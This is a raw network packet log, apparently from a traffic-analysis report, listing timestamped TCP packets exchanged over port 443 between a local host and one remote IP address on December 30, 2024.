                                                                                                                                                                                Dec 30, 2024 19:45:58.850836039 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.850929022 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.851144075 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.851156950 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.851203918 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.851210117 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.851401091 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.851418018 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.851449013 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.851457119 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.851469994 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.851504087 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.852891922 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.934407949 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.934429884 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.934489965 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.934494019 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.934503078 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.934523106 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.934535027 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.934566975 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.934572935 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.934587002 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.934608936 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.934843063 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.934860945 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.934902906 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.934907913 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.934933901 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.934957981 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.936534882 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.936551094 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.936639071 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.936644077 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.936777115 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.936799049 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.936858892 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.936866999 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.937006950 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.937021017 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.937088013 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.937094927 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.937199116 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.937216997 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.937285900 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.937300920 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.937342882 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.937349081 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.937377930 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.937397957 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.937546968 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.937560081 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.937606096 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.937612057 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:58.938664913 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:58.939524889 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.020772934 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.020797014 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.020845890 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.020857096 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.020869017 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.021034956 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.021053076 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.021086931 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.021091938 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.021109104 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.021123886 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.021287918 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.021302938 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.021359921 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.021365881 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.022830963 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.022831917 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.022840977 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.022870064 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.022882938 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.022891045 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.022918940 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.022933006 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.022970915 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.022986889 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.023025990 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.023030996 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.023056984 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.023072004 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.023220062 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.023241043 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.023271084 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.023276091 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.023303986 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.023310900 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.023473024 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.023509979 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.023525000 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.023565054 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.023567915 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.023582935 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.023605108 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.023788929 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.023807049 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.023849010 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.023854017 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.023873091 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.023910999 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.025348902 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.107136011 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.107152939 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.107207060 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.107215881 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.107242107 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.107259989 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.107336044 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.107347965 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.107393026 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.107398987 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.107419014 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.107444048 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.107600927 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.107615948 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.107664108 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.107670069 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.107717991 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.109141111 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.109154940 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.109338999 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.109369993 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.109388113 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.109400034 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.109428883 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.109594107 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.109606981 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.109644890 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.109652042 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.109675884 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.109795094 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.109850883 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.109864950 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.109911919 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.109918118 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.110173941 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.110193014 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.110229015 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.110239029 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.110254049 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.114170074 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.193792105 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.193808079 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.193875074 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.193886042 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.193990946 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.194008112 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.194048882 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.194056988 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.194075108 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.194122076 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.194139004 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.194170952 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.194178104 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.194197893 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.195359945 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.195378065 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.195441961 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.195449114 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.195832014 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.195844889 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.195894957 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.195904970 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.195952892 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.195976019 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.196002960 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.196010113 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.196022987 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.196161985 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.196181059 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.196222067 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.196230888 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.196444035 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.196463108 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.196499109 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.196505070 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.196526051 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.197594881 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.199229956 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.279875040 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.279889107 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.280010939 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.280025005 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.280034065 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.280061007 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.280101061 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.280107021 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.280142069 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.280375004 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.280386925 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.280447960 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.280456066 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.281744957 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.281764030 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.281800985 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.281807899 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.281841040 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.281955957 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.281969070 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.282032967 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.282041073 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.282411098 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.282427073 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.282464981 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.282469988 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.282494068 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.282505989 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.282521963 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.282552958 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.282558918 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.282591105 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.282871962 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.282891989 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.282922029 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.282929897 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.282944918 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.284194946 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.366151094 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.366173029 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.366219997 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.366233110 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.366260052 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.366269112 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.366329908 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.366343975 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.366394043 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.366400003 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.366626024 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.366646051 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.366650105 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.366662979 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.366673946 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.366707087 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.366724014 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.367980003 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.368004084 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.368066072 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.368073940 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.368201971 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.368220091 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.368256092 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.368262053 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.368287086 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.368308067 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.368611097 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.368633032 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.368684053 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.368689060 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.368701935 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.368729115 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.368875980 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.368889093 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.368937016 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.368941069 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.369199038 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.369215965 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.369257927 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.369265079 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.369277000 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.369304895 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.370218992 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.466525078 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.466545105 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.466595888 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.466608047 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.466636896 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.466653109 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.466835976 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.466854095 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.466895103 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.466902018 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.466926098 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.466938972 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.467022896 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.467036963 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.467075109 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.467080116 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.467133999 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.467363119 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.467376947 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.467417955 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.467422962 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.467451096 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.467466116 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.467545986 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.467562914 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.467601061 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.467607021 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.467633009 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.467650890 CET50076443192.168.2.445.118.248.184
                                                                                                                                                                                Dec 30, 2024 19:45:59.467869997 CET4435007645.118.248.184192.168.2.4
                                                                                                                                                                                Dec 30, 2024 19:45:59.467885017 CET4435007645.118.248.184192.168.2.4
